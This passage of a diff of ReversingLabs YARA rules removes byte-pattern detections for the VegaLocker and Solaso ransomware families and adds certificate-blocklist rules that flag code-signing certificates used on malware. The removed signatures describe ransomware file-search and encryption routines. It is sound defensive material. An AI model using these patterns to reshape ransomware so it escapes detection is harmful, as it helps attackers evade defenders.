52 ?? 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? B1 ?? - E8 ?? ?? ?? ?? 8D 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 55 ?? B8 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 55 ?? 8B - 08 FF 51 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? F7 - 40 ?? ?? ?? ?? ?? 76 ?? 8B 45 ?? E8 ?? ?? ?? ?? 83 45 ?? ?? FF 4D ?? 0F 85 ?? ?? ?? - ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8 - ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 - 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? - ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 - } - condition: - uint16(0)==0x5A4D and ($enum_resources) and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Prince city music bar" and pe.signatures[i].serial=="2c:16:be:9a:7c:e2:a2:3a:b7:a4:b4:eb:7d:a3:40:0c" and 1371081600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Vegalocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE { meta: - description = "Yara rule that detects VegaLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "53eec8d1-bab0-5556-92c0-1b70eb763fa5" - date = "2020-07-15" - modified = "2020-07-15" + id = "218543f3-298f-5038-8fa9-3abeda9e4d8f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.VegaLocker.yara#L1-L100" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8616e72fc435676179e83a304d4111c8f29ebf3cd79ff5b2d229cca8fc97c2a3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15332-L15348" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b348c502aeae036f6d17283260ed4479427f89c8c25f2b6d59e137e90694dbe4" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "VegaLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? - ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 - ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 - ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? - ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 - ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 - 03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03 - C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 - 48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 - ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D - ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8D 45 ?? E8 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 - FF 30 64 89 20 C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 - ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68 - ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 - 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? - 33 D2 8B 45 ?? 8B 08 FF 51 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B - 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C6 - 85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 - 64 89 10 EB ?? E9 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 - } - $encrypt_files_p2 = { - 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ?? - A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 - ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ?? - 0F 8E ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB - ?? 7E ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? - ?? 8D 45 ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ?? - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? - ?? 8D 45 ?? E8 ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? - ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 83 - BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA - } - $encrypt_files_p3 = { - E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? - EB ?? 8D 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B - 08 FF 51 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? - E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ?? - ?? ?? 59 EB ?? 55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? - ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? - ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? - 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IMS INTERACTIVE MEDIA SOLUTIONS" and pe.signatures[i].serial=="22:ac:ca:d2:35:fb:1a:c7:42:2e:be:5e:a7:ac:9b:c5" and 1019001600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Solaso : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE { meta: - description = "Yara rule that detects Solaso ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "53f56ad8-ccdf-58f0-a5d9-e58f2c18ac76" - date = "2021-11-02" - modified = "2021-11-02" + id = "e1834597-4e45-5866-97f4-e00c79190930" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Solaso.yara#L1-L171" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "368a80a9f2e264d17c61d6ed4c22baec838ba0b0bc2e5c79344830bf861aa5a2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15350-L15366" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "78ede4b02cb1b07500cd0c4f1f33da598938940d0f58430edda00d79b19b16a5" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Solaso" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - C6 85 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 4C 89 AD ?? ?? ?? ?? 48 8D 85 - ?? ?? ?? ?? 48 89 45 ?? B1 ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D - 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B BD - ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? 49 3B FF 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8D - 95 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? - ?? 48 0F 43 95 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 8B C8 E8 ?? ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 - ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ?? - 4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CF 48 83 7F ?? ?? 72 - ?? 48 8B 0F BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? - 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 89 AD ?? - ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 8B B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ?? - ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ?? 48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 85 ?? ?? ?? - ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 - } - $find_files_p2 = { - 8B DE 48 83 CB ?? 48 3B D8 48 0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D - 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 - 0F 84 ?? ?? ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8 - E8 ?? ?? ?? ?? EB ?? 49 8B C5 48 89 85 ?? ?? ?? ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8 - ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 4C 89 6D ?? 4C 89 6D ?? 48 8B - B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ?? - 48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 45 ?? 48 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 - B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 8B DE 48 83 CB ?? 48 89 5D ?? 48 3B D8 48 - 0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? - ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ?? ?? ?? 48 83 C0 ?? - 48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8 E8 ?? ?? ?? ?? EB ?? 49 8B C5 - 48 89 45 ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 48 89 5D ?? 48 89 75 ?? 4C - 8D 85 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8D - } - $encrypt_files_p1 = { - 48 63 53 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 45 33 - C0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? - 4C 63 43 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 4B ?? 48 85 C9 0F 84 - ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 3B CA 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48 - 83 BD ?? ?? ?? ?? ?? 48 0F 43 45 ?? C6 04 01 ?? EB ?? 48 8B F1 48 2B F2 4C 8B 85 ?? - ?? ?? ?? 49 8B C0 48 2B C2 48 3B F0 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 7D ?? 49 83 F8 - ?? 48 0F 43 7D ?? 48 03 FA 4C 8B C6 33 D2 48 8B CF E8 ?? ?? ?? ?? C6 04 37 ?? EB ?? - 0F AE E8 C6 44 24 ?? ?? 4C 8B CE 48 8B D6 48 8D 4D ?? E8 ?? ?? ?? ?? 33 F6 8B 43 ?? - 99 41 F7 FD B9 ?? ?? ?? ?? 85 C0 0F 45 C8 89 4B ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 4C 63 - C9 4C 8D 45 ?? 48 8D 54 24 ?? E8 ?? ?? ?? ?? 48 8B F8 48 3B D8 74 ?? 48 8B 0B 48 85 - } - $encrypt_files_p2 = { - C9 74 ?? 48 8B 53 ?? E8 ?? ?? ?? ?? 48 8B 0B 48 8B 53 ?? 48 2B D1 48 83 E2 ?? 48 81 - FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87 - ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 48 89 33 48 89 73 ?? 48 89 73 ?? 48 8B 07 48 89 - 03 48 8B 47 ?? 48 89 43 ?? 48 8B 47 ?? 48 89 43 ?? 48 89 37 48 89 77 ?? 48 89 77 ?? - 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C - 24 ?? 48 2B D1 48 83 E2 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 - ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 74 24 ?? - 0F 57 C0 F3 0F 7F 44 24 ?? EB ?? 48 8B 0B 48 8D 45 ?? 48 3B C8 74 ?? 48 8D 55 ?? 48 - 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB E8 - ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 74 - ?? 33 FF 0F 1F 40 ?? 66 0F 1F 84 00 ?? ?? 00 00 4C 8B 03 4C 03 C7 49 8B D0 49 83 78 - ?? ?? 72 ?? 49 8B 10 4D 8B 40 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 63 CE 48 C1 E1 ?? 48 - } - $encrypt_files_p3 = { - 03 0B 45 33 C0 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0B 48 03 CF 48 C7 41 ?? ?? - ?? ?? ?? 48 83 79 ?? ?? 72 ?? 48 8B 09 C6 01 ?? FF C6 48 83 C7 ?? 3B 73 ?? 75 ?? 48 - 8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ?? - 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 - 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 33 F6 F6 44 0C - ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D - ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? - 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 48 8D 4C 24 ?? E8 - ?? ?? ?? ?? BB ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 44 24 ?? - 48 03 C8 41 8B D4 48 83 79 ?? ?? 0F 45 D3 0B 51 ?? 45 33 C0 E8 ?? ?? ?? ?? 48 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 85 - ?? ?? ?? ?? 48 03 C8 48 83 79 ?? ?? 44 0F 45 E3 44 0B 61 ?? 45 33 C0 41 8B D4 E8 ?? - ?? ?? ?? 90 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 89 BC 0D ?? ?? ?? ?? 48 8B 85 ?? ?? - ?? ?? 48 63 48 ?? 8D 91 ?? ?? ?? ?? 89 94 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 84 0D ?? ?? ?? - ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 8D 51 ?? 89 94 0D ?? ?? ?? ?? 48 8D 1D ?? ?? ?? - ?? 48 89 9D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44 24 ?? 48 63 - } - $encrypt_files_p4 = { - 48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 91 ?? ?? ?? - ?? 89 54 0C ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 05 ?? - ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 51 ?? 89 54 0C ?? 48 89 5D ?? - 48 8D 4D ?? E8 ?? ?? ?? ?? 90 49 8B 57 ?? 48 83 FA ?? 72 ?? 49 8B 0F 48 FF C2 48 81 - FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87 - ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89 77 ?? 49 C7 47 ?? ?? ?? ?? ?? 41 C6 07 ?? - 49 8B 56 ?? 48 83 FA ?? 72 ?? 48 FF C2 49 8B 0E 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 - ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89 - 76 ?? 49 C7 46 ?? ?? ?? ?? ?? 41 C6 06 ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? - ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3 - E8 - } - $encrypt_files_p5 = { - 48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 4C 89 40 ?? 55 41 54 41 55 41 56 41 57 - 48 8D 68 ?? 48 81 EC ?? ?? ?? ?? 45 8B E1 49 8B D8 44 8B 4D ?? 48 8B FA 44 8B 45 ?? - 48 8B F1 41 8B D4 48 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 00 F2 0F 10 48 ?? 0F 11 45 ?? 66 - 0F 73 D8 ?? 66 49 0F 7E C7 F2 0F 11 4D ?? 49 C1 EF ?? F2 0F 11 4D ?? 4C 89 7D ?? 41 - 83 FF ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 89 07 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ?? - ?? ?? C7 00 ?? ?? ?? ?? EB ?? 8B 4D ?? 4C 8D 4D ?? 4C 8B 75 ?? 41 8B C4 48 8B 55 ?? - 45 8B C7 C1 E8 ?? 49 C1 EE ?? F7 D0 44 0B 75 ?? 83 E0 ?? C7 06 ?? ?? ?? ?? 33 F6 48 - 89 74 24 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B CB 48 C1 EA ?? C7 45 ?? ?? ?? ?? ?? 48 - 89 75 ?? 89 45 ?? 4C 89 75 ?? FF 15 ?? ?? ?? ?? 8B 5D ?? B9 ?? ?? ?? ?? 4C 8B E8 48 - 83 F8 ?? 75 ?? 8B C3 23 C1 3B C1 75 ?? 41 F6 C4 ?? 74 ?? 8B 4D ?? 4C 8D 4D ?? 48 89 - 74 24 ?? 0F BA F3 ?? 89 5D ?? 45 8B C7 48 8B 55 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B - } - $encrypt_files_p6 = { - 4D 